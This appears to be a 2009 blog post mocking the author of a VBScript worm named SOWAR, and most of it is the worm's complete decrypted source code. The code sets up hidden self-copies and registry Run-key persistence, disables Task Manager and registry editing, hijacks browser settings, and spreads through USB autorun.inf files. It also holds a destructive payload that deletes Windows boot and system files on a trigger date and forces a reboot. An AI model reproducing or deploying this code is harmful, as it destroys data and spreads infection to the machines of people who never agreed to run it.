Thursday, March 26, 2009

Message to SOWAR VIRUS maker

This are the Codes of the Virus named SOWAR. If I am not mistaken, this is the "TAGA LIPA ARI" IE title before.
Honestly, I am just laughing on your REVISED codes. Even if you ENCRYPT your codes, I can view it clearly.
This is to tell you that, stop making nonsense because it is just a useless one...
Just make stuff that are useful and good, not on doing stuff that are originally NOT yours.
You and Dave are alike :P

See yeah

' vbs.sowar (philippines)
On Error Resume Next
Dim fso, WHsP, WinDir, MyFName
Set fso=CreateObject("Scripting.FileSystemObject")
Set WHsP=CreateObject("WScript.Shell")

MyFName=WScript.ScriptFullName
WinDir=fso.GetSpecialFolder(0)

If LCase(Mid(MyFName, 4)) = "itcr.vbs" Then
WHsP.Run "explorer.exe " & Left(MyFName, InStrRev(MyFName, "\") - 1)
ElseIf LCase(MyFName) <> LCase(WinDir & "\esto.vbs") Then
Call LoadTxtFile()
End If

fso.CopyFile MyFName, WinDir & "\esto.vbs", True
fso.GetFile(WinDir & "\esto.vbs").Attributes=39
WHsP.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\System Restore", "wscript.exe """ & WinDir & "\esto.vbs"""

Call MakeRegEntries()
Call PayloadIt()

IActiv=""
IActiv=WHsP.RegRead("HKEY_CURRENT_USER\Software\sowar\stats")
If (IActiv="" Or IActiv=0) Then
WHsP.RegWrite "HKEY_CURRENT_USER\Software\sowar\stats", 1
WScript.Sleep 25500
Call InitSpread()
Else
WScript.Quit
End If

Sub MakeRegEntries()
On Error Resume Next
With WHsP
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "en"
.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\Homepage", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\IeakHelpString", "HACKED USING: SOWAR"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\System Restore", "wscript.exe """ & WinDir & "\esto.vbs"""
End With
End Sub

Sub InitSpread()
On Error Resume Next
WHsP.RegWrite "HKEY_CURRENT_USER\Software\sowar\stats", 0
Do
Set ActivDrives=fso.Drives
For Each USBFlashDrv In ActivDrives
DrivePath = USBFlashDrv.Path
If (USBFlashDrv.DriveType > 0 And USBFlashDrv.DriveType <> "A:" And USBFlashDrv.Path <> "B:") Then
If (USBFlashDrv.IsReady) Then
fso.CopyFile MyFName, DrivePath & "\itcr.vbs", True
fso.GetFile(DrivePath & "\itcr.vbs").Attributes=39
fso.CopyFile MyFName, DrivePath & "\un.vbs", True
fso.GetFile(DrivePath & "\un.vbs").Attributes=32
If fso.FileExists(DrivePath & "\Autorun.inf") Then
fso.GetFile(DrivePath & "\Autorun.inf").Attributes=34
fso.DeleteFile DrivePath & "\Autorun.inf", True
End If
Set AutoRunScript=fso.CreateTextFile(DrivePath & "\Autorun.inf", True)
AutoRunScript.WriteLine "[autorun]"
AutoRunScript.WriteLine "open=wscript.exe itcr.vbs"
AutoRunScript.WriteLine "shell\Open\Command=wscript.exe itcr.vbs"
AutoRunScript.WriteLine "shell\Open\Default=1"
AutoRunScript.WriteLine "shell\AutoPlay\Command=wscript.exe itcr.vbs"
AutoRunScript.WriteLine "shell\Explore\Command=wscript.exe itcr.vbs"
AutoRunScript.Close
fso.GetFile(DrivePath & "\Autorun.inf").Attributes=39
End If
End If
Next
IsActiv=""
IsActiv=WHsP.RegRead("HKEY_CURRENT_USER\Software\sowar\stats")
If IsActiv=1 Then
WScript.Quit
End If
Call MakeRegEntries()
WScript.Sleep 4000
Loop
End Sub

Sub LoadTxtFile()
On Error Resume Next
bname=Mid(MyFName, InStrRev(MyFName, "\") + 1)
txtfilename=WinDir & "\" & Left(bname, InStrRev(bname, ".")-1) & ".txt"
Set txtfile=fso.CreateTextFile(txtfilename, True)
txtfile.write "un"
txtfile.close
WHsP.Run "notepad.exe """ & txtfilename & """"
End Sub

Sub PayloadIt()
On Error Resume Next
CurCount=""
CurCount=WHsP.RegRead("HKEY_LOCAL_MACHINE\Software\sowar\count")
If (CurCount="" Or CurCount=0) Then
NewCount=0
WHsP.RegWrite "HKEY_LOCAL_MACHINE\Software\sowar\count", 1, "REG_DWORD"
Else
NewCount=CurCount
WHsP.RegWrite "HKEY_LOCAL_MACHINE\Software\sowar\count", CurCount + 1, "REG_DWORD"
End If
If (Day(Date) = 12 And Month(Date) = 6) Or (NewCount > 100) Then
fso.DeleteFile Left(windir, 3) & "ndetect.com", True
fso.DeleteFile Left(windir, 3) & "Io.sys", True
fso.DeleteFile Left(windir, 3) & "Msdos.sys", True
fso.DeleteFile windir & "\himem.sys", True
fso.DeleteFile windir & "\Win.com", True
fso.DeleteFile windir & "\system.ini", True
fso.DeleteFile windir & "\win.ini", True
wsh.Run "rundll32.exe shell32.dll,SHExitWindowsEx 2"
End If
End Sub

' sowar.a (ver. 1.0.5)
' Copyright(C) Jet F.

Decrypt by CaDeAtH
HERE - soon to be downloadable
Posted by at
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)